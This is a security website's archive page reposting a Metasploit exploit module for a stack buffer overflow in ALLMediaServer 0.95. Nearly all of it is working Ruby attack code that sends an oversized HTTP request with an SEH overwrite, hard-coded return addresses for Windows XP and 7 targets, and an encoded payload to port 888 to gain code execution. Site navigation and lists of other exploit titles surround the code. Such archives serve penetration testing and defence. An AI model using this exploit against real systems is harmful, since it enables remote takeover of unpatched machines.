首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ALLMediaServer 0.95 Buffer Overflow Vulnerability
来源:metasploit.com 作者:metacom 发布时间:2013-08-26  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh
  
  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'ALLMediaServer 0.95 Buffer Overflow Exploit',
      'Description'  => %q{
          This module exploits a stack buffer overflow in ALLMediaServer 0.95. The vulnerability
          is caused due to a boundary error within the handling of HTTP request.
      },
      'License'    => MSF_LICENSE,
      'Author'    =>
        [
          'metacom<metacom27[at]gmail.com>'# Original discovery
          '<metacom>'# MSF Module
          'Romanian Security Team - RST',
        ],
      'References'  =>
        [
          [ 'OSVDB', '<insert OSVDB number here>' ],
          [ 'CVE', 'insert CVE number here' ],
          [ 'URL', 'insert another link to the exploit/advisory here' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', #none/process/thread/seh
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'  => 'win',
      'Payload'  =>
        {
          'BadChars' => "\x00", # <change if needed>
          'DisableNops' => true,
        },
  
      'Targets'    =>
        [
          [ 'ALLMediaServer 0.95 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'     =>  0x0042173c, # pop eax # pop ebx # ret  - MediaServer.exe
              'Offset'  =>  1065
            }
          ],
          
          
      [ 'ALLMediaServer 0.95 / Windows XP SP3', # Windows XP SP3 - English'
       {
        'Ret'     =>  0x006f0854, # pop ecx # pop ebp # ret  - MediaServer.exe
        'Offset'  =>  1065
       }
      ],
    ],
      'Privileged'  => false,
      #Correct Date Format: "M D Y"
      #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
      'DisclosureDate'  => 'Aug 21 2013',
      'DefaultTarget'  => 0))
  
    register_options([Opt::RPORT(888)], self.class)
  
  end
  
  def exploit
  
  
    connect
    buffer = "http://"
    buffer << rand_text(target['Offset'])  #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded  #3931 bytes of space
    # more junk may be needed to trigger the exception
  
    print_status("Sending payload to ALLMediaServer on #{target.name}...")
    sock.put(buffer)
  
    handler
    disconnect
  
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Netgear ProSafe - Denial of Se
·ALLMediaServer version 0.95 SE
·Samba nttrans Reply - Integer
·dreamMail e-mail client v4.6.9
·Samba nttrans Reply - Integer
·Oracle Endeca Server Remote Co
·freeFTPd 1.0.10 (PASS Command)
·Schneider Electric PLC ETY Ser
·Graphite Web Unsafe Pickle Han
·libtiff <= 3.9.5 - Integer Ove
·PCMAN FTP 2.07 STOR Command -
·Belkin G Wireless Router Firmw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved